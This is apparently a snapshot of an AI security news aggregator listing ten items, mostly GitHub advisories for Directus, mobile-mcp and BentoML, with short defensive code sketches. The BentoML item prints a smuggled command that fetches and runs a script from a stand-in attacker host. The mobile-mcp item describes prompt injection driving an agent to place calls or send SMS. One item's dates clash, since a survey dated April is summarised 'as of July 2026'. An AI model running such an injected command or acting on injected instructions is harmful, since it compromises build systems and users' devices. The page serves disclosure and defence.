aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

Total tracked: 3,710
Last 24 hours: 1
Last 7 days: 1
Daily Briefing: Saturday, May 16, 2026

No new AI/LLM security issues were identified today.

Latest Intel

01

research-llm-apis 2026-04-04

research
Apr 4, 2026

A developer is redesigning the abstraction layer (a simplified interface that handles communication with many different AI services) of their LLM Python library to support new vendor features such as server-side tool execution (where the AI provider runs code on its own servers rather than the user's computer). The developer used Claude Code to analyze Python client libraries from major AI vendors and to generate test commands that probe how these services handle both streaming (real-time data flow) and non-streaming responses across different scenarios.

Simon Willison's Weblog
02

A Survey on Recent Advances in Conversational Data Generation

research
Apr 4, 2026

This is a survey paper published in an academic journal that reviews recent progress in conversational data generation, which refers to techniques for creating dialogue datasets (collections of conversations) used to train and improve AI systems. The paper appears to be a comprehensive overview of advances in this field as of July 2026, but no specific technical findings, vulnerabilities, or security issues are described in the provided content.

ACM Digital Library (TOPS, DTRAP, CSUR)
03

Really, you made this without AI? Prove it

policy, industry
Apr 4, 2026

As generative AI (machine learning systems that create text, images, and other content) becomes better at mimicking human work, people increasingly doubt whether online content is human-made, yet platforms often don't label AI-generated material. The author suggests creating a universal labeling system (similar to Fair Trade certification) that marks human-created content instead, since AI systems have no incentive to identify their own work but human creators do to protect themselves from being replaced.

The Verge (AI)
04

Hackers Are Posting the Claude Code Leak With Bonus Malware

security
Apr 4, 2026

Anthropic's source code for Claude Code (an AI coding tool) was accidentally made public, and hackers have been reposting it on GitHub with infostealer malware (software that steals personal information) embedded in the code. Anthropic has been trying to remove the leaked copies by issuing copyright takedown notices, initially targeting over 8,000 repositories before narrowing efforts to 96 copies.

Fix: Anthropic has been issuing copyright takedown notices to remove copies of the leaked code from GitHub.

Wired (Security)
05

GHSA-mvv8-v4jj-g47j: Directus: Sensitive fields exposed in revision history

security, privacy
Apr 4, 2026

Directus, a content management system, failed to properly sanitize sensitive data (like user tokens, two-factor authentication secrets, and API keys) before storing them in revision history records. This meant that anyone with access to the revision database table could read these secrets in plaintext, potentially allowing account takeover or unauthorized access to third-party services.
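The standard fix for this class of bug is to mask secret-bearing fields before the revision record is ever written. A minimal sketch of that idea, with hypothetical field names (not Directus's actual schema or code):

```python
# Hypothetical sketch: redact secret-bearing fields before persisting a
# revision record, so plaintext tokens never reach the revisions table.
# Field names below are illustrative, not Directus's actual schema.

SENSITIVE_FIELDS = {"token", "tfa_secret", "api_key", "password"}

def redact_revision(delta: dict) -> dict:
    """Return a copy of a revision delta with secret fields masked."""
    return {
        key: "**********" if key in SENSITIVE_FIELDS else value
        for key, value in delta.items()
    }

delta = {"email": "user@example.com", "token": "abc123", "tfa_secret": "JBSWY3DP"}
print(redact_revision(delta))
# {'email': 'user@example.com', 'token': '**********', 'tfa_secret': '**********'}
```

Masking at write time means a later leak of the revisions table exposes only placeholders, not reusable credentials.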

GitHub Advisory Database
06

GHSA-qqmv-5p3g-px89: Directus: TUS Upload Authorization Bypass Allows Arbitrary File Overwrite

security
Apr 4, 2026

Directus has a security flaw in its TUS resumable upload endpoint (a feature that lets users upload files in chunks) that lets any authenticated user overwrite any file in the system by specifying its UUID (unique identifier), bypassing row-level permissions (rules like 'users can only edit their own files'). This can lead to permanent data loss and allow low-privilege users to replace important files with malicious content.

Fix: Disable TUS uploads by setting `TUS_ENABLED=false` if resumable uploads are not required.
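Beyond disabling TUS, the underlying repair is to subject resumable uploads to the same per-file permission test that ordinary edits get. A hypothetical sketch of that missing check (all names illustrative, not Directus's code):

```python
# Hypothetical sketch of the missing check (names are illustrative, not
# Directus's code): authentication alone is not enough; the requester must
# pass the same row-level permission test that governs normal file edits.

class Forbidden(Exception):
    pass

def apply_tus_patch(user: dict, file_record: dict, chunk: bytes, store: dict) -> None:
    """Append an upload chunk, but only if this user may write this file."""
    if not (user.get("admin") or file_record["owner"] == user["id"]):
        raise Forbidden(f"user {user['id']!r} may not write file {file_record['uuid']!r}")
    store[file_record["uuid"]] = store.get(file_record["uuid"], b"") + chunk

store: dict = {}
record = {"uuid": "f-1", "owner": "alice"}

apply_tus_patch({"id": "alice", "admin": False}, record, b"ok", store)  # permitted
try:
    apply_tus_patch({"id": "mallory", "admin": False}, record, b"evil", store)
except Forbidden:
    print("overwrite blocked")  # low-privilege overwrite is refused
```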

GitHub Advisory Database
07

GHSA-5qhv-x9j4-c3vm: @mobilenext/mobile-mcp: Arbitrary Android Intent Execution via mobile_open_url

security, safety
Apr 4, 2026

The mobile_open_url tool in mobile-mcp doesn't check what type of URL scheme (the protocol prefix like http:// or tel://) it receives before sending it to Android, allowing attackers to use prompt injection (tricking an AI by hiding instructions in its input) to execute dangerous commands like making phone calls, sending SMS messages, or accessing private data on a connected mobile device.

Fix: Upgrade to version 0.0.50 or later, which restricts mobile_open_url to http:// and https:// schemes by default. Users who require other URL schemes can opt in by setting the environment variable MOBILEMCP_ALLOW_UNSAFE_URLS=1.
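The fix amounts to a scheme allowlist checked before the URL reaches the operating system. A sketch of that pattern in Python (mobile-mcp itself is a Node project; the environment-variable name comes from the advisory, everything else is illustrative):

```python
# Illustrative sketch of the allowlist the fix describes (not the actual
# mobile-mcp source; the env-var name comes from the advisory): reject any
# URL whose scheme is not explicitly permitted before it reaches the OS.
import os
from urllib.parse import urlparse

SAFE_SCHEMES = {"http", "https"}

def check_url(url: str) -> str:
    if os.environ.get("MOBILEMCP_ALLOW_UNSAFE_URLS") == "1":
        return url  # explicit, documented opt-out
    scheme = urlparse(url).scheme.lower()
    if scheme not in SAFE_SCHEMES:
        raise ValueError(f"blocked URL scheme: {scheme!r}")
    return url

print(check_url("https://example.com"))  # passes through
try:
    check_url("tel:5551234")
except ValueError as exc:
    print(exc)  # blocked URL scheme: 'tel'
```

An allowlist is preferable to a blocklist here because Android intents accept many schemes (`intent://`, `sms://`, custom app schemes) that are easy to miss one by one.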

GitHub Advisory Database
08

Anthropic essentially bans OpenClaw from Claude by making subscribers pay extra

industry
Apr 3, 2026

Anthropic is changing its policy so Claude users can no longer use their subscription to access OpenClaw (a third-party tool that integrates with Claude), forcing them to pay separately instead. The change takes effect April 4th, and may be motivated by Anthropic wanting to promote its own competing tools like Claude Cowork.

The Verge (AI)
09

GHSA-v959-cwq9-7hr6: BentoML: SSTI via Unsandboxed Jinja2 in Dockerfile Generation

security
Apr 3, 2026

BentoML's Dockerfile generation uses an unsandboxed Jinja2 template engine (a tool that processes template files with dynamic code) with dangerous extensions enabled, allowing attackers to embed malicious code in a template file. When a victim imports a malicious bento archive and runs the containerize command, the attacker's code executes directly on the victim's host machine before any container isolation happens, rather than inside a container where it would be restricted.

GitHub Advisory Database
10

GHSA-fgv4-6jr3-jgfw: BentoML: Command Injection in cloud deployment setup script

security
Apr 3, 2026

BentoML has a command injection vulnerability in its cloud deployment setup script where user-supplied system packages are inserted directly into shell commands without proper escaping. An attacker can craft a malicious bentofile.yaml file that executes arbitrary commands on BentoCloud's build infrastructure (the servers that prepare applications for deployment) when the application is deployed, potentially stealing secrets or compromising the infrastructure.
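The standard guard against this class of flaw is to quote each user-supplied value before interpolating it into a shell command, e.g. with Python's `shlex.quote` (illustrative of the technique, not BentoML's actual patch):

```python
# Illustration of the injection class (not BentoML's code): interpolating a
# user-supplied package name into a shell string, versus quoting it first so
# the whole value becomes a single harmless argument.
import shlex

package = "curl; curl http://attacker.example/x | sh"  # attacker-controlled

unsafe = f"apt-get install -y {package}"
safe = f"apt-get install -y {shlex.quote(package)}"

print(unsafe)  # the text after ';' would run as a second shell command
print(safe)    # the payload is wrapped in quotes and cannot break out
```

Passing an argument list to the process API without a shell at all (e.g. `subprocess.run([...])`) avoids the problem entirely where the command structure is fixed.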

GitHub Advisory Database